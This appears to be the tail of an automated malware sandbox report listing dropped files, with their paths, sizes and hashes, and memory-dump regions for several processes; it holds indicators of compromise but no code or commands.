SHA1e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA2565abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\ConfirmAssert.docFilesize
696KB
MD5028d0a09e91f9b57a8182ee4081600d6
SHA1c896756b1840360632c126c1d1196a8c40c08953
SHA256a501ce082f063265b0c867832d030bf947b616cb6c53c9ff337c393b013be02b
SHA512b5b78739fc203b17f85bb91d5f3e065d965312920d211117da575582362b291cbecb0809177033c6ec78ec1c3175666a4535c43ab21cf602df08a6b2cd5cd367
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Files.docxFilesize
11KB
MD54a8fbd593a733fc669169d614021185b
SHA1166e66575715d4c52bcb471c09bdbc5a9bb2f615
SHA256714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42
SHA5126b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Opened.docxFilesize
11KB
MD5bfbc1a403197ac8cfc95638c2da2cf0e
SHA1634658f4dd9747e87fa540f5ba47e218acfc8af2
SHA256272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6
SHA512b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Recently.docxFilesize
11KB
MD53b068f508d40eb8258ff0b0592ca1f9c
SHA159ac025c3256e9c6c86165082974fe791ff9833a
SHA25607db44a8d6c3a512b15f1cb7262a2d7e4b63ced2130bc9228515431699191cc7
SHA512e29624bc8fecb0e2a9d917642375bd97b42502e5f23812195a61a4920cae5b6ed540e74dfcf8432dcceb7de906ad0501cdd68056f9b0ec86a6bb0c1e336bfe32
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\TestSave.xlsxFilesize
575KB
MD52eaf04302a9db7e1ef3f9ae20c958c3b
SHA1c5a48885f11db301aafd8fb02bd5aaa58bce0436
SHA2562367f8157540c7ecdc0141a1d7f2d167348d580f559bed8c6ddea8af152f06d6
SHA512a8a51dd060e855fa4b71b18c56e9b7db069d0f7ca12a00c39297911f31c3c7052b50685cc40aedc6c8219aee3006de8e76e61d92491a33dab18dd572f987c013
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\These.docxFilesize
11KB
MD587cbab2a743fb7e0625cc332c9aac537
SHA150f858caa7f4ac3a93cf141a5d15b4edeb447ee7
SHA25657e3b0d22fa619da90237d8bcf8f922b142c9f6abf47efc5a1f5b208c4d3f023
SHA5126b678f0dd0030806effe6825fd52a6a30b951e0c3dcf91dfd7a713d387aa8b39ec24368e9623c463360acba5e929e268f75ce996526c5d4485894b8ac6b2e0fa
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\UnblockReceive.docFilesize
817KB
MD57da173de21f768e6c4d9971c09c19705
SHA19870fa5f4550534a07ca6bcf7e01de5ed77acefc
SHA2569419181ba9c8ea9d37d42ff71e2f40b65983602c9ae8bddd215191c614bab3b9
SHA512d083cda2afd1229580e4b50eda8df49c526f2c12282ff2f208f653a4434cf5db55a4fe5ae57f724505773d8d3b6ca899ce7253680707a8be714926cb935d91b6
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\BackupCopy.wmaFilesize
581KB
MD5d503300c67f3f813b3434e164edde0f5
SHA17f5c37dc978a5c7d8f8315bf4d1fdd49af6042b8
SHA2561f3f1fd50bef05d07090b9c646bb6e49109fca6ed8fcfdedf5ba1dbb1ae2a1ed
SHA51232f2d9699f2c67ff1160871b78fb16d7ecfd593686f3607acafd0a492a4d0fdd1a7ae4798299e2ecc70049c9cf3a6198f05fbd02ce2b74202771cc7fa7c62e06
-
\??\c:\Users\Admin\AppData\Local\Temp\n4htjhpf\CSC1EA102E094254315AA7332DEBC3018E2.TMPFilesize
652B
MD58e55213375d58a53af6d318bf60de295
SHA147e338c69dcf7c98afd4ba25c5ac5408dc1801ef
SHA256b989a5369c0118c8814b3aed01f863ae8773251e416c3e1f6b08045a0094176c
SHA512d03df8b7256c38dc63919043362eb05a5c19664a485bca88b53e69ab73a68561fbef1a7fff2283b1a3970a552dda86b845d6d7a5d8ad831e6239418b4b3a0010
-
\??\c:\Users\Admin\AppData\Local\Temp\n4htjhpf\n4htjhpf.0.csFilesize
1004B
MD5c76055a0388b713a1eabe16130684dc3
SHA1ee11e84cf41d8a43340f7102e17660072906c402
SHA2568a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA51222d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2
-
\??\c:\Users\Admin\AppData\Local\Temp\n4htjhpf\n4htjhpf.cmdlineFilesize
607B
MD54251e3f43fd5b791048daf330da1092b
SHA18ebc6897c6525083647bdbf9fec63631964696d6
SHA25639de84021e70184ac57746f9e88de3c1b0e1868ad1642e920ea832c08a67ab3b
SHA512d27198fad5cd975b40b2fbb60029dec8c7b520a860230d69e21addc90d2aa42b2b5e6160cd4b5403ca3ac14e9c63ba41aba1326f17684ae43f660ee0a9738827
-
memory/368-192-0x00000211E1FC0000-0x00000211E1FC8000-memory.dmpFilesize
32KB
-
memory/3908-108-0x0000024DD9DB0000-0x0000024DD9DD2000-memory.dmpFilesize
136KB
-
memory/4436-83-0x00007FFA052F3000-0x00007FFA052F5000-memory.dmpFilesize
8KB
-
memory/4512-58-0x00007FFA17030000-0x00007FFA1704E000-memory.dmpFilesize
120KB
-
memory/4512-74-0x00000297E2280000-0x00000297E25F7000-memory.dmpFilesize
3.5MB
-
memory/4512-68-0x00007FFA06500000-0x00007FFA06965000-memory.dmpFilesize
4.4MB
-
memory/4512-73-0x00007FFA06000000-0x00007FFA06377000-memory.dmpFilesize
3.5MB
-
memory/4512-194-0x00007FFA06380000-0x00007FFA064F1000-memory.dmpFilesize
1.4MB
-
memory/4512-66-0x00007FFA16FA0000-0x00007FFA16FCE000-memory.dmpFilesize
184KB
-
memory/4512-217-0x00007FFA17620000-0x00007FFA17644000-memory.dmpFilesize
144KB
-
memory/4512-216-0x00007FFA06500000-0x00007FFA06965000-memory.dmpFilesize
4.4MB
-
memory/4512-231-0x00007FFA17010000-0x00007FFA17029000-memory.dmpFilesize
100KB
-
memory/4512-227-0x00007FFA06000000-0x00007FFA06377000-memory.dmpFilesize
3.5MB
-
memory/4512-226-0x00007FFA16CA0000-0x00007FFA16D57000-memory.dmpFilesize
732KB
-
memory/4512-222-0x00007FFA06380000-0x00007FFA064F1000-memory.dmpFilesize
1.4MB
-
memory/4512-221-0x00007FFA17030000-0x00007FFA1704E000-memory.dmpFilesize
120KB
-
memory/4512-230-0x00007FFA05EE0000-0x00007FFA05FF8000-memory.dmpFilesize
1.1MB
-
memory/4512-225-0x00007FFA16FA0000-0x00007FFA16FCE000-memory.dmpFilesize
184KB
-
memory/4512-64-0x00007FFA16FD0000-0x00007FFA16FDD000-memory.dmpFilesize
52KB
-
memory/4512-62-0x00007FFA17010000-0x00007FFA17029000-memory.dmpFilesize
100KB
-
memory/4512-60-0x00007FFA06380000-0x00007FFA064F1000-memory.dmpFilesize
1.4MB
-
memory/4512-78-0x00007FFA174A0000-0x00007FFA174CC000-memory.dmpFilesize
176KB
-
memory/4512-56-0x00007FFA178D0000-0x00007FFA178E8000-memory.dmpFilesize
96KB
-
memory/4512-54-0x00007FFA174A0000-0x00007FFA174CC000-memory.dmpFilesize
176KB
-
memory/4512-30-0x00007FFA17620000-0x00007FFA17644000-memory.dmpFilesize
144KB
-
memory/4512-48-0x00007FFA17B40000-0x00007FFA17B4F000-memory.dmpFilesize
60KB
-
memory/4512-24-0x00007FFA06500000-0x00007FFA06965000-memory.dmpFilesize
4.4MB
-
memory/4512-72-0x00007FFA17620000-0x00007FFA17644000-memory.dmpFilesize
144KB
-
memory/4512-69-0x00007FFA16CA0000-0x00007FFA16D57000-memory.dmpFilesize
732KB
-
memory/4512-76-0x00007FFA16C80000-0x00007FFA16C95000-memory.dmpFilesize
84KB
-
memory/4512-82-0x00007FFA17030000-0x00007FFA1704E000-memory.dmpFilesize
120KB
-
memory/4512-81-0x00007FFA05EE0000-0x00007FFA05FF8000-memory.dmpFilesize
1.1MB
-
memory/4512-79-0x00007FFA16F90000-0x00007FFA16F9D000-memory.dmpFilesize
52KB
-
memory/4512-297-0x00007FFA06500000-0x00007FFA06965000-memory.dmpFilesize
4.4MB
-
memory/4512-303-0x00007FFA06380000-0x00007FFA064F1000-memory.dmpFilesize
1.4MB
-
memory/4512-298-0x00007FFA17620000-0x00007FFA17644000-memory.dmpFilesize
144KB
-
memory/4512-322-0x00000297E2280000-0x00000297E25F7000-memory.dmpFilesize
3.5MB
-
memory/4512-330-0x00007FFA17010000-0x00007FFA17029000-memory.dmpFilesize
100KB
-
memory/4512-338-0x00007FFA06500000-0x00007FFA06965000-memory.dmpFilesize
4.4MB
-
memory/4512-343-0x00007FFA17030000-0x00007FFA1704E000-memory.dmpFilesize
120KB
-
memory/4512-342-0x00007FFA178D0000-0x00007FFA178E8000-memory.dmpFilesize
96KB
-
memory/4512-341-0x00007FFA174A0000-0x00007FFA174CC000-memory.dmpFilesize
176KB
-
memory/4512-340-0x00007FFA17B40000-0x00007FFA17B4F000-memory.dmpFilesize
60KB
-
memory/4512-339-0x00007FFA17620000-0x00007FFA17644000-memory.dmpFilesize
144KB
-
memory/4512-337-0x00007FFA05EE0000-0x00007FFA05FF8000-memory.dmpFilesize
1.1MB
-
memory/4512-336-0x00007FFA16F90000-0x00007FFA16F9D000-memory.dmpFilesize
52KB
-
memory/4512-335-0x00007FFA16C80000-0x00007FFA16C95000-memory.dmpFilesize
84KB
-
memory/4512-333-0x00007FFA16CA0000-0x00007FFA16D57000-memory.dmpFilesize
732KB
-
memory/4512-332-0x00007FFA16FA0000-0x00007FFA16FCE000-memory.dmpFilesize
184KB
-
memory/4512-331-0x00007FFA16FD0000-0x00007FFA16FDD000-memory.dmpFilesize
52KB
-
memory/4512-329-0x00007FFA06380000-0x00007FFA064F1000-memory.dmpFilesize
1.4MB
-
memory/4512-334-0x00007FFA06000000-0x00007FFA06377000-memory.dmpFilesize
3.5MB